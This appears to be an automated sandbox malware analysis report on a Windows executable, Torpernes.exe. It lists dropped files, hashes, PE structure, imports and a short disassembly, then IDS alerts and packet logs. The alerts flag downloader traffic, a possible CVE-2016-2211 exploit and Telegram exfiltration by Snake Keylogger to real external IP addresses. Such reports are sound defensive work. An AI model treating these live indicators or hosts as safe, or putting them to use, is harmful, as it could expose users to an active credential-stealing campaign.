SSDEEP: | 6144:gRGYT84P6OIpXGZP31SmNYayhBJxWj9DlcK77hA456in:MT84COSsFSdaCxYn |
MD5: | 6CA54912856A504C6D0347BD9B57DDFD |
SHA1: | 7C9354362785D249DF664498EAD9AE7246F244FE |
SHA-256: | 0E91233482A61EB85E81D38C4E838E7B2157A27431CF6180BDBD4B995C35AAFA |
SHA-512: | D5F868C39390B2AE6A571292F96B802D0401B3F57607B6769D3B566DC6E632CB61036372142930F51746785C03EA0EE31C69BF4B3351E718A093879BFB77D7B1 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems\genfortl.kom
Download File
Process: | C:\Users\user\Desktop\Torpernes.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 944215 |
Entropy (8bit): | 1.253403336418641 |
Encrypted: | false |
SSDEEP: | 1536:UyGaAJZQVIsL4WNkRjeGXJIp9Oc52NVuN75fZTD5p1v5E1bkGgMF/3tDLREMUPS+:UyGxUL4a6vXJIWhru791ublLeDPS0ASD |
MD5: | 1CB1238607E8954A7923966A49CDB3E0 |
SHA1: | BFF6A1E896BB0BE28E1BFCFD0094BCD36078D849 |
SHA-256: | 6A76541EE87E4E7E547F500D01CC9D50EE681DBF067FE8D4E5735F5BD22AC999 |
SHA-512: | 4B691C9C24C15DA18B9C3F221333692F1CA364B96765AE94EC01FD2BF004449A57DDE3E6E89B8A567DA2FC05F53BA7FBA853AC8B367F298A1C444CCC5F3DAE5F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems\leucocythaemia.lob
Download File
Process: | C:\Users\user\Desktop\Torpernes.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 962689 |
Entropy (8bit): | 1.2611239746227794 |
Encrypted: | false |
SSDEEP: | 3072:3wRHrOD/R6APMwv2g5tvYRY0zgsRVL7YapsU7:3KHri/3P20wRB8CYE77 |
MD5: | 5318799C0891E41C4824B117782D972C |
SHA1: | B7708ECD85A69E6158EA05A6B5BDC1B8CE826199 |
SHA-256: | 254A5A9B8B3F20A38A993C62D3F16EE3F7D98176769F97C58248C27C77A4C032 |
SHA-512: | 9AA1B82B35C17D11B57749B399F4280F2D2FD111AA8523E1FA7CB82DBAC3A968F3CBE09310B4A592550517CC10F2EDCE63F919AE1399FD8160D55B0A8E65866E |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\Vaabenstyringssystems\teknonom.txt
Download File
Process: | C:\Users\user\Desktop\Torpernes.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 258 |
Entropy (8bit): | 4.211163838509549 |
Encrypted: | false |
SSDEEP: | 6:zDW+YfJM8yFa2cip84JmfABwvPDOrCK6ZLtpAS/cV0rg1CkFL:ChMzFa2cip8MDwvPDOrXS4Ag1C+L |
MD5: | 17EACC32277AC454B9E9981F5E3EA80B |
SHA1: | 6D18F25A482B59AB8AC0D485D9594A147320B396 |
SHA-256: | C03BC7EDD150C4DC8A88F160D8863489F09AACEE6F9CE5071E0D962332522A6C |
SHA-512: | 2854AE7B957D8DD01436DB85587E61B348990452E546785C907A50CE0253338CAA1CA268800426243B35C11BDAA32CFC8115A1FC8F4E9081B8DA36822CD107A7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\Myrmecophile\indregistreringers\Tangerendes\discontiguous.alk
Download File
Process: | C:\Users\user\Desktop\Torpernes.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 802681 |
Entropy (8bit): | 1.2504268364374471 |
Encrypted: | false |
SSDEEP: | 1536:NKhLrR2iZCjGIP8dRVIVuLWjmO7fg7RKVFw+UPDsVTWD04FMUtdmTWO5XQc/G9vp:URN2sRoTzFB6D046UOPJu9vvio |
MD5: | 176BA5DE5FE97864B7468DD8BCE8C38E |
SHA1: | 01804C24EDC45329980BF040FCF8EFFFAF4B471D |
SHA-256: | 84DFBA8A9B3F62629795FA225C836FDCD3708595325E98F6248E3C72A4DD6C9B |
SHA-512: | EC9E44DA08D30FC5241BB06792127530993B038A1B0C20A546241EAD3663AFCFD2E4C02F73465A0723E1D9E7DF10FCB6C19888776911C49F646ABF6EB5E70254 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.384565087462512 |
TrID: |
|
File name: | Torpernes.exe |
File size: | 1'283'968 bytes |
MD5: | ecc4ff0ee7d123f0e90587ea3a7b9ae3 |
SHA1: | 70e6f747f9bae57619817beb11f836fa8a873726 |
SHA256: | 1e0a46fd7b7b0706d4d5918ba666abdcccc67be4be89874b5cb2ca9ea8b12a83 |
SHA512: | 28f1d457d0a8556cf0bd62fc33556b22d3307e0527a25d451877bcaa9b76b1595d5170e5a221491007d2e8ca5e3a5f384c556f40830576dc942aa0252dbe8a71 |
SSDEEP: | 24576:qZbqxGFMhCGa7cQPncULq/YWx7k83oD1dEUu28KkzFu7biFA:ybqxGFMhCGa7cQ0ULxWx6MXLFgbi+ |
TLSH: | 0655D0153A49890ED2936B788E58F37A5764DFCD3A16830296F0CDB7F9ACD8BAD405C0 |
File Content Preview: | MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....\.U.................^...*.......1.......p....@ |
Icon Hash: | 49f571b3129a9201 |
Entrypoint: | 0x4031ff |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
DLL Characteristics: | DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Time Stamp: | 0x55C15CE0 [Wed Aug 5 00:46:24 2015 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 4 |
OS Version Minor: | 0 |
File Version Major: | 4 |
File Version Minor: | 0 |
Subsystem Version Major: | 4 |
Subsystem Version Minor: | 0 |
Import Hash: | 7ed0d71376e55d58ab36dc7d3ffda898 |
Signature Valid: | false |
Signature Issuer: | CN="Vicegerents Nolendes ", O=Slvknappede, L=Rockwood, S=Michigan, C=US |
Signature Validation Error: | A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider |
Error Number: | -2146762487 |
Not Before, Not After |
|
Subject Chain |
|
Version: | 3 |
Thumbprint MD5: | 8F6ED964E29B10521097F5E1F2D31785 |
Thumbprint SHA-1: | 022CE78AA85D6D20EF075D7499744D4516AADF30 |
Thumbprint SHA-256: | E3E76A1533813ED1A2A55533A06A026F62239ED962B809E576E401949A4C3B91 |
Serial: | 0F4BC7A006DB1332596FDFB90A31A28AB0444F58 |
Instruction |
---|
sub esp, 000002D8h |
push ebx |
push ebp |
push esi |
push edi |
push 00000020h |
xor ebp, ebp |
pop esi |
mov dword ptr [esp+18h], ebp |
mov dword ptr [esp+10h], 004092D8h |
mov dword ptr [esp+14h], ebp |
call dword ptr [00407034h] |
push 00008001h |
call dword ptr [00407134h] |
push ebp |
call dword ptr [004072ACh] |
push 00000009h |
mov dword ptr [00429278h], eax |
call 00007F956115D836h |
mov dword ptr [004291C4h], eax |
push ebp |
lea eax, dword ptr [esp+38h] |
push 000002B4h |
push eax |
push ebp |
push 00420670h |
call dword ptr [0040717Ch] |
push 004092C0h |
push 004281C0h |
call 00007F956115D4A1h |
call dword ptr [00407138h] |
mov ebx, 00434000h |
push eax |
push ebx |
call 00007F956115D48Fh |
push ebp |
call dword ptr [0040710Ch] |
push 00000022h |
mov dword ptr [004291C0h], eax |
pop edi |
mov eax, ebx |
cmp word ptr [00434000h], di |
jne 00007F956115A8F9h |
mov esi, edi |
mov eax, 00434002h |
push esi |
push eax |
call 00007F956115CEDFh |
push eax |
call dword ptr [00407240h] |
mov ecx, eax |
mov dword ptr [esp+1Ch], ecx |
jmp 00007F956115A9EBh |
push 00000020h |
pop edx |
cmp ax, dx |
jne 00007F956115A8F9h |
inc ecx |
inc ecx |
cmp word ptr [ecx], dx |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7494 | 0xb4 | .rdata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4f000 | 0x69fd8 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x138e20 | 0x960 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x2b8 | .rdata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x5d98 | 0x5e00 | 60fc9e652ab60b696b4471d2d740a415 | False | 0.6669714095744681 | data | 6.471759151304203 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
.rdata | 0x7000 | 0x1354 | 0x1400 | 2f90a087fd075d2b61c65e6db9ea1417 | False | 0.4314453125 | data | 5.037502749366 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x9000 | 0x202b8 | 0x600 | 76eba87d06ba726298375b77b72945b6 | False | 0.4733072916666667 | data | 3.7505342023618717 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.ndata | 0x2a000 | 0x25000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
.rsrc | 0x4f000 | 0x69fd8 | 0x6a000 | ba23276a82e0d244e1672be1b2a31f09 | False | 0.5017619582841981 | data | 5.158881628031345 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
---|---|---|---|---|---|---|
RT_ICON | 0x4f328 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.4722756457673758 |
RT_ICON | 0x91350 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.5095676091328523 |
RT_ICON | 0xa1b78 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.5717626655455119 |
RT_ICON | 0xab020 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.583641404805915 |
RT_ICON | 0xb04a8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.5690836088804913 |
RT_ICON | 0xb46d0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.6310165975103734 |
RT_ICON | 0xb6c78 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.651735459662289 |
RT_ICON | 0xb7d20 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.7151639344262295 |
RT_DIALOG | 0xb86a8 | 0x100 | data | English | United States | 0.5234375 |
RT_DIALOG | 0xb87a8 | 0x11c | data | English | United States | 0.6056338028169014 |
RT_DIALOG | 0xb88c8 | 0x60 | data | English | United States | 0.7291666666666666 |
RT_GROUP_ICON | 0xb8928 | 0x76 | data | English | United States | 0.7372881355932204 |
RT_VERSION | 0xb89a0 | 0x2f8 | data | English | United States | 0.4986842105263158 |
RT_MANIFEST | 0xb8c98 | 0x33f | XML 1.0 document, ASCII text, with very long lines (831), with no line terminators | English | United States | 0.5547533092659447 |
DLL | Import |
---|---|
KERNEL32.dll | CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte |
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow |
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor |
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW |
ADVAPI32.dll | RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW |
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy |
ole32.dll | CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize |
VERSION.dll | GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Signature | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
2024-07-25T09:56:55.795858+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49746 | 443 | 192.168.2.4 | 188.114.96.3 |
2024-07-25T09:56:44.263078+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
2024-07-25T09:57:07.855040+0200 | TCP | 2853006 | ETPRO MALWARE Snake Keylogger Telegram Exfil | 49753 | 443 | 192.168.2.4 | 149.154.167.220 |
2024-07-25T09:56:49.886487+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49740 | 80 | 192.168.2.4 | 158.101.44.242 |
2024-07-25T09:56:51.785131+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49742 | 13.85.23.86 | 192.168.2.4 |
2024-07-25T09:56:47.794238+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49739 | 443 | 192.168.2.4 | 188.114.96.3 |
2024-07-25T09:56:47.325602+0200 | TCP | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
2024-07-25T09:56:12.458951+0200 | TCP | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 443 | 49730 | 40.127.169.103 | 192.168.2.4 |
2024-07-25T09:56:41.888830+0200 | TCP | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
2024-07-25T09:56:53.587006+0200 | TCP | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 49744 | 443 | 192.168.2.4 | 188.114.96.3 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jul 25, 2024 09:56:37.410363913 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:37.410406113 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:37.410590887 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:37.423291922 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:37.423306942 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:41.243168116 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:41.243480921 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:41.438091993 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:41.438122988 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:41.438494921 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:41.438550949 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:41.442693949 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:41.488497972 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:41.888952971 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:41.889035940 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:41.889082909 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:41.889199972 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:41.889199972 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:41.889224052 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:41.889256954 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:41.889271021 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:41.895879984 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:41.895946980 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:41.896019936 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:41.896034956 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:41.896058083 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:41.896080017 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.056603909 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.056637049 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.056945086 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.056966066 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.057013988 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.062400103 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.062426090 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.062505007 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.062515974 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.062556028 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.066598892 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.066622019 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.066701889 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.066710949 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.066747904 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.249479055 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.249517918 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.249774933 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.249789000 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.249830961 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.262808084 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.262835979 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.262902021 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.262917995 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.262937069 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.262959957 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.266331911 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.266351938 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.266444921 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.266465902 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.266511917 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.267251968 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.267308950 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.267321110 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.267337084 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.267359972 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.267401934 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.267721891 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.267739058 CEST | 443 | 49736 | 185.98.5.168 | 192.168.2.4 |
Jul 25, 2024 09:56:42.267759085 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:42.267786980 CEST | 49736 | 443 | 192.168.2.4 | 185.98.5.168 |
Jul 25, 2024 09:56:43.308645964 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:43.313673019 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:43.313752890 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:43.313987970 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:43.325756073 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:44.039083958 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:44.043277025 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:44.050964117 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:44.221239090 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4 |
Jul 25, 2024 09:56:44.263077974 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:44.889420986 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:44.889476061 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:44.889539957 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:44.891222000 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:44.891237974 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:45.663990974 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:45.664077044 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:45.667785883 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:45.667819023 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:45.668137074 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:45.674765110 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:45.720510960 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:45.804851055 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:45.804961920 CEST | 443 | 49738 | 188.114.96.3 | 192.168.2.4 |
Jul 25, 2024 09:56:45.805162907 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:45.811618090 CEST | 49738 | 443 | 192.168.2.4 | 188.114.96.3 |
Jul 25, 2024 09:56:45.821000099 CEST | 49737 | 80 | 192.168.2.4 | 158.101.44.242 |
Jul 25, 2024 09:56:45.826069117 CEST | 80 | 49737 | 158.101.44.242 | 192.168.2.4 |
